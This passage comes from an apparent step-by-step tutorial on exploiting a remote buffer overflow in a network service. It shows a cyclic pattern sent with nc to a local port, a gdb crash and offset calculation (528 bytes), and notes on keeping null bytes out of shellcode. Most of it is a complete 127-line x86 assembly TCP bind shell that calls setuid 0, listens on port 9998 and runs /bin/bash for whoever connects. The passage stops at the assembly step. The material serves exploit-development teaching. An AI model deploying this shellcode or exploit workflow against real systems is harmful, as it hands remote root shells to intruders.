Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gkquot;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41367241 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:/usr/share/metasploit-framework/tools$ /span./pattern_offset.rb span class="m"41367241/span/span span class="code-line"span class="go"[*] Exact match at offset 528/span/span span class="code-line"/code/pre/div /td/tr/table pGreat! So both methods agree. :-)/p h2Developing The Exploit/h2 pSo now to start developing the exploit, which brings us to our second major difference when attacking a remote application./p pIn parts 1 and 2 we put our a href="https://en.wikipedia.org/wiki/Shellcode" target="_blank"shellcode/a inside an environment variable but with a network application we don't have that ability so the shellcode has to be sent to the server some other way. The most obvious way is to send it with our exploit payload which is what we will do here./p pThis also brings up another important feature of shellcode development, our payload is being put through 'strncpy' which means if it contains any null bytes '\x00' then it will cut our shellcode short and ultimately break the exploit. The shellcode I wrote and used in the first 2 parts had no null bytes but this wasn't necessary because we were storing it in a variable but as we can't do that now it is important that there are no null's./p pThe third major difference is obviously the shellcode, the pervious shellcode just launched a shell, that would be useless here because we need a way to connect to the shell so we have to also create a network socket and either bind to a port so we can connect to it or connect out to another machine./p pI've chosen to write a TCP bindshell for this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; set up a socket listening on port 9998/spanspan class="w"/span/span span class="code-line"span class="c1"; once we receive a connection duplicate/spanspan class="w"/span/span span class="code-line"span class="c1"; stdin, stdout and stderr to run over that/spanspan class="w"/span/span span class="code-line"span class="c1"; client socket and execute execve with/spanspan class="w"/span/span span class="code-line"span class="c1"; /bin/bash/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"global/spanspan class="w" /spanspan class="nv"_start/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"section/spanspan class="w" /spanspan class="nv".text/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; zero out all the registers/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"edx/spanspan class="p",/spanspan class="w" /spanspan class="nb"edx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x17/spanspan class="w" /spanspan class="c1"; put 23 into eax to setuid/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; zero out ebx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; make the syscall setuid/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; zero out eax again/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x66/spanspan class="w" /spanspan class="c1"; put the sys call number 102 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"bl/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x1/spanspan class="w" /spanspan class="c1"; select SOCKET to create a new socket/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; push the arguments onto the stack in/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; reverse order and null terminate/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x1/spanspan class="w" /spanspan class="c1"; SOCK_STREAM/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x2/spanspan class="w" /spanspan class="c1"; AF_INET/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the arguments/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall socketcall SOCKET/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"esi/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; move the descriptor returned into/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; esi for use later/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x66/spanspan class="w" /spanspan class="c1"; put the sys call number 102 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"bl/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x2/spanspan class="w" /spanspan class="c1"; select BIND to bind to a port/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; push the struct sockaddr onto the stack in/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; reverse order and null terminate/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="kt"WORD/spanspan class="w" /spanspan class="mh"0x0e27/spanspan class="w" /spanspan class="c1"; port 9998/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"bx/spanspan class="w" /spanspan class="c1"; AF_INET/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the struct sockaddr/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x10/spanspan class="w" /spanspan class="c1"; socklen_t argument (16)/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; struct sockaddr/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"esi/spanspan class="w" /spanspan class="c1"; descriptor returned by the call to socket/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the arguments/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall socketcall BIND/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x66/spanspan class="w" /spanspan class="c1"; put the sys call number 102 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"bl/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x4/spanspan class="w" /spanspan class="c1"; select LISTEN/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x1/spanspan class="w" /spanspan class="c1"; push arguments to bind onto the stack/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; in reverse/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"esi/spanspan class="w" /spanspan class="c1"; push descriptor returned by call to socket/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the arguments/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall socketcall LISTEN/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x66/spanspan class="w" /spanspan class="c1"; put the sys call number 102 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"bl/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x5/spanspan class="w" /spanspan class="c1"; select ACCEPT to start accepting connections/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; push arguments to accept onto the stack/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; in reverse order we only need the destriptor/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"esi/spanspan class="w" /spanspan class="c1"; here/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the arguments/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall socketcall ACCEPT/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; move the descriptor returned by accept/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ebx to be the first argument to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; dup2/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; zero out ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"cl/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x3/spanspan class="w" /spanspan class="c1"; get the ecx register ready to decrement/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"dupfd:/spanspan class="w" /spanspan class="c1"; the label for our loop through stdin, stdout and stderr/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"dec/spanspan class="w" /spanspan class="nb"cl/spanspan class="w" /spanspan class="c1"; decrement ecx so we include 2, 1 and 0/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x3f/spanspan class="w" /spanspan class="c1"; put the sys call number 63 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall dup2/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"jne/spanspan class="w" /spanspan class="nv"dupfd/spanspan class="w" /spanspan class="c1"; create the loop/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; zero out eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; null terminate the string/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x68736162/spanspan class="w" /spanspan class="c1"; push the string ////bin/bash/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x2f6e6962/spanspan class="w" /spanspan class="c1"; in reverse/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="mh"0x2f2f2f2f/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the string into ebx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; push the second argument to execve onto the/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; stack in reverse order/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; move the address of the 2nd argument/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; into ecx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"push/spanspan class="w" /spanspan class="nb"edx/spanspan class="w" /spanspan class="c1"; the thrid argument to execve/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"edx/spanspan class="p",/spanspan class="w" /spanspan class="nb"esp/spanspan class="w" /spanspan class="c1"; a null pointer/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0xb/spanspan class="w" /spanspan class="c1"; put the sys call number 11 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall execve/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pNow to assemble, link and test the shellcode:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spannasm -f elf32 -o bindshell.o bindshell.nasm/span span class="code-line"span class="gp"testuser@dev:~$ 